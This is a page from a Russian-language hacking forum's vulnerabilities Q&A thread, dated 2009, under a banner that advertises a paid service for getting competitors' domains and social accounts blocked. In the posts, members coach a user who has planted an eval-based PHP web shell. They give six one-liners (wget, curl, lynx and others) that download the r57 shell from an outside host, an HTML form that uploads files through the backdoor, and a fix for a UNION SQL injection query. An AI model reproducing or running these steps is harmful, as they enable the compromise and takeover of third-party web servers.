УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1087 из 1393

1087

Опции темы

Поиск в этой теме

Опции просмотра

#10861

20.12.2009, 23:37

DeluxeS

Участник форума

Регистрация: 01.08.2009

Сообщений: 183

Провел на форуме:
1483264

Репутация: 131

Залили шелл c eval($_GET['b']); Что дальше ?

#10862

20.12.2009, 23:40

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

Цитата:

Сообщение от DeluxeS

Залили шелл c eval($_GET['b']); Что дальше ?

видно из веба? залил в файл с каким расширением? добавил "<?php ?>" к коду?

__________________
Появляюсь редко. Важные дела в реале.

#10863

20.12.2009, 23:42

DeluxeS

Участник форума

Регистрация: 01.08.2009

Сообщений: 183

Провел на форуме:
1483264

Репутация: 131

Цитата:

Сообщение от AFoST

видно из веба? залил в файл с каким расширением? добавил "<?php ?>" к коду?

из веба видно
.php
добавил. не знаю как залить полноценный шелл

#10864

20.12.2009, 23:45

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

теперь обратись к скрипту site/file.php?b=ls
если выведет список директорий. то воспользуйся одним из следующих способов скачивания файла с помощью командной строки.

Цитата:

lynx -source "http://www.evilc0der.com/r57.txt" > ./r57.php
links -source "http://www.evilc0der.com/r57.txt" > ./r57.php
wget -O ./r57.php http://www.evilc0der.com/r57.txt
GET http://www.evilc0der.com/r57.txt > ./r57.php
fetch -o ./r57.php http://www.evilc0der.com/r57.txt
curl --output perl http://www.evilc0der.com/r57.txt

__________________
Появляюсь редко. Важные дела в реале.

#10865

20.12.2009, 23:56

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от DeluxeS

Залили шелл c eval($_GET['b']); Что дальше ?

Цитата:

Сообщение от AFoST

теперь обратись к скрипту site/file.php?b=ls

AFoST не торопись

DeluxeS почитай что-нибудь, зачем тебе шелл. если ты не знаешь что делать?

#10866

21.12.2009, 00:03

DeluxeS

Участник форума

Регистрация: 01.08.2009

Сообщений: 183

Провел на форуме:
1483264

Репутация: 131

Цитата:

Сообщение от jokester

AFoST не торопись

DeluxeS почитай что-нибудь, зачем тебе шелл. если ты не знаешь что делать?

Заменил eval на system, всё ок

#10867

21.12.2009, 00:03

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Цитата:

Сообщение от jokester

AFoST не торопись

DeluxeS почитай что-нибудь, зачем тебе шелл. если ты не знаешь что делать?

как обычно, суета =\
ты прав, поправляюсь)
site/file.php?b=phpinfo();
должно вылезти сопсно оно)
а залить так
создаешь форму
<form action="site/file.php?b=copy($_FILES[file][tmp_name], $_GET[aa]);&aa=/path/file.php" method="post" enctype="multipart/form-data">
<input type="file" name="file"><br>
<input type="submit" value="Загрузить"><br>
</form>
открываешь выбираешь файл и жмёшь отправить

__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 21.12.2009 в 00:09..

#10868

21.12.2009, 06:09

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

если на запрос .php?pageNum_Year=-2007/**/union/**/select/**/version(),2/*

Цитата:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

КАК правильно составит запрос

#10869

21.12.2009, 06:14

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

Провел на форуме:
5749763

Репутация: 1680

Отправить сообщение для Nightmarе с помощью ICQ

Цитата:

Сообщение от YuNi|[c

если на запрос .php?pageNum_Year=-2007/**/union/**/select/**/version(),2/*

КАК правильно составит запрос

Если вместо версии ставить циферку, то ошибки нету?
Если нету, и циферка выводится, значит кодируй данные. HEX или Char

#10870

21.12.2009, 07:45

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Последнее время это самый популярный вопрос в теме))
unhex(hex(version()))

Страница 1087 из 1393

1087

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход